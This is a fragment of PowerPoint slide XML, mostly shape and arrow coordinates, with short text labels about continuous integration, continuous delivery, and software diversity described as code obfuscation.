                  <a:pt x="714375" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714375" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="914400" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="800100" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800100" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="1114425" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114425" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114425" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="1162939" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1162939" y="142874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1305813" y="71500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162939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5" name="object 7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061192" y="7600188"/>
            <a:ext cx="464820" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="object 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11741657" y="7687944"/>
            <a:ext cx="1306195" cy="142875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="114300" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="314325" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200025" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314325" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314325" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="514350" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400050" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514350" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514350" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="714375" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="600075" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600075" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714375" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="714375" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="914400" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="800100" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800100" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="1114425" y="57149"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="57149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000125" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114425" y="85724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1114425" y="57149"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1306194" h="142875">
                <a:moveTo>
                  <a:pt x="1162939" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1162939" y="142874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1305813" y="71500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162939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7" name="object 77"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7088314" y="7581900"/>
            <a:ext cx="3900170" cy="341630"/>
            <a:chOff x="7088314" y="7581900"/>
            <a:chExt cx="3900170" cy="341630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="object 78"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8859774" y="7688071"/>
              <a:ext cx="2128520" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2128520" h="142875">
                  <a:moveTo>
                    <a:pt x="1985391" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1985238" y="57105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999615" y="57149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999487" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985162" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985009" y="142874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100230" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999487" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100320" y="85680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2128139" y="71881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985391" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2128520" h="142875">
                  <a:moveTo>
                    <a:pt x="1985238" y="57105"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1985162" y="85680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999487" y="85724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999615" y="57149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985238" y="57105"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2128520" h="142875">
                  <a:moveTo>
                    <a:pt x="0" y="50926"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="79501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985162" y="85680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985238" y="57105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="50926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17636" y="7581900"/>
              <a:ext cx="341375" cy="341375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7102602" y="7753350"/>
              <a:ext cx="1416050" cy="3810"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1416050" h="3809">
                  <a:moveTo>
                    <a:pt x="0" y="3809"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1415923" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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1" name="object 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9446386" y="8161172"/>
            <a:ext cx="2518410" cy="142875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2518409" h="142875">
                <a:moveTo>
                  <a:pt x="2490422" y="57086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2389378" y="57086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389505" y="85661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375230" y="85734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375535" y="142875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2518029" y="70713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2490422" y="57086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2518409" h="142875">
                <a:moveTo>
                  <a:pt x="2375077" y="57159"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="69303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254" y="97878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375230" y="85734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375077" y="57159"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2518409" h="142875">
                <a:moveTo>
                  <a:pt x="2389378" y="57086"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2375077" y="57159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2375230" y="85734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389505" y="85661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2389378" y="57086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2518409" h="142875">
                <a:moveTo>
                  <a:pt x="2374773" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2375077" y="57159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2490422" y="57086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2374773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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282565" y="7338821"/>
            <a:ext cx="6684645" cy="12998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35" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-35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600" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Integration</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4090670" marR="5080" indent="-574675">
              <a:lnSpc>
                <a:spcPts val="4280"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Continuous </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>delivery </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="50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600" spc="20" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Continuous</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25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600" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development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8351710" y="8072628"/>
            <a:ext cx="1094105" cy="341630"/>
            <a:chOff x="8351710" y="8072628"/>
            <a:chExt cx="1094105" cy="341630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="84" name="object 8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04375" y="8072628"/>
              <a:ext cx="341375" cy="341376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8365997" y="8231886"/>
              <a:ext cx="739140" cy="13335"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="739140" h="13334">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="739140" y="12877"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28574">
              <a:solidFill>
                <a:srgbClr val="0075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76491" y="306451"/>
            <a:ext cx="33000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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Diversity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18666" y="1933193"/>
            <a:ext cx="1362075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Software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diversity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refer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obfuscation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techniques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used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make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code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difficult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detect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as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malicious.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35396" y="760476"/>
            <a:ext cx="4536948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282185" y="4476115"/>
            <a:ext cx="2401570" cy="1701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 indent="-635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef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Runtime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 environment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contai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comp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led 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interpreted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code.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23018" y="3140138"/>
            <a:ext cx="4321175" cy="4310380"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="407733" y="1029652"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="354139" y="976185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327418" y="1017460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301752" y="1059205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277126" y="1101420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253555" y="1144066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231025" y="1187132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209550" y="1230604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189115" y="1274457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169735" y="1318679"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151396" y="1363243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134112" y="1408137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117868" y="1453324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102666" y="1498815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88531" y="1544561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75425" y="1590560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63385" y="1636788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52387" y="1683232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42430" y="1729867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33515" y="1776666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25666" y="1823618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18859" y="1870710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13093" y="1917915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382" y="1965223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4711" y="2012607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2095" y="2060041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="2107514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2155012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520" y="2202497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2095" y="2249970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4711" y="2297404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8382" y="2344788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13093" y="2392095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18859" y="2439301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25666" y="2486393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33515" y="2533345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42430" y="2580144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52387" y="2626779"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63385" y="2673223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75425" y="2719451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88531" y="2765450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102666" y="2811195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117868" y="2856687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134112" y="2901873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151396" y="2946768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="169735" y="2991332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189115" y="3035554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209550" y="3079407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231025" y="3122879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253555" y="3165945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277126" y="3208591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301752" y="3250806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327418" y="3292551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354139" y="3333813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407733" y="3280346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381342" y="3238220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356057" y="3195599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331876" y="3152533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308787" y="3109036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286791" y="3065119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265912" y="3020809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246126" y="2976130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227431" y="2931096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209842" y="2885732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193357" y="2840050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177965" y="2794076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163664" y="2747835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150482" y="2701328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138379" y="2654604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127393" y="2607665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117500" y="2560523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108699" y="2513228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101003" y="2465768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94411" y="2418181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88912" y="2370480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84518" y="2322690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81216" y="2274836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79019" y="2226919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77914" y="2178977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77914" y="2131034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79019" y="2083092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81216" y="2035175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84518" y="1987321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88912" y="1939531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94411" y="1891830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101003" y="1844243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108699" y="1796783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117500" y="1749488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127393" y="1702346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138379" y="1655406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150482" y="1608683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163664" y="1562176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177965" y="1515935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193357" y="1469961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209842" y="1424279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227431" y="1378915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246126" y="1333881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265912" y="1289202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286791" y="1244892"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="308787" y="1200975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="331876" y="1157478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356057" y="1114412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381342" y="1071791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407733" y="1029652"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="4321175" h="4310380">
                <a:moveTo>
                  <a:pt x="1780857" y="3914330"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1732838" y="3903256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1685328" y="3890937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1638338" y="3877386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591894" y="3862616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546009" y="3846652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1500708" y="3829520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1455991" y="3811232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1411897" y="3791801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368437" y="3771252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1325626" y="3749598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283487" y="3726853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1242034" y="3703053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1201293" y="3678199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1161275" y="3652316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1121994" y="3625418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1083475" y="3597529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045730" y="3568674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1008786" y="3538855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="972654" y="3508083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937361" y="3476409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="902919" y="3443821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="869353" y="3410356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836663" y="3376015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804887" y="3340836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="774026" y="3304819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="744118" y="3267989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715162" y="3230372"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687184" y="3191967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="660209" y="3152813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="634250" y="3112922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609320" y="3072307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585444" y="3030982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="562648" y="2988983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="540931" y="2946311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="520319" y="2902991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="500824" y="2859036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="482485" y="2814472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465302" y="2769311"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="449300" y="2723578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="434492" y="2677287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420903" y="2630449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408546" y="2583103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="397446" y="2535237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333057" y="2535237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343674" y="2583472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355523" y="2631198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368579" y="2678417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="382816" y="2725115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398233" y="2771267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="414794" y="2816872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432498" y="2861881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="451332" y="2906306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471258" y="2950121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492277" y="2993313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514362" y="3035858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537502" y="3077743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561682" y="3118942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="586879" y="3159455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613067" y="3199257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="640257" y="3238322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668401" y="3276650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="697509" y="3314217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="727544" y="3350996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758494" y="3386988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="790346" y="3422154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823087" y="3456508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856691" y="3489998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="891146" y="3522637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="926426" y="3554387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="962533" y="3585248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="999426" y="3615182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1037107" y="3644201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075550" y="3672255"/>
                </a:lnTo>
                <a:lnTo>
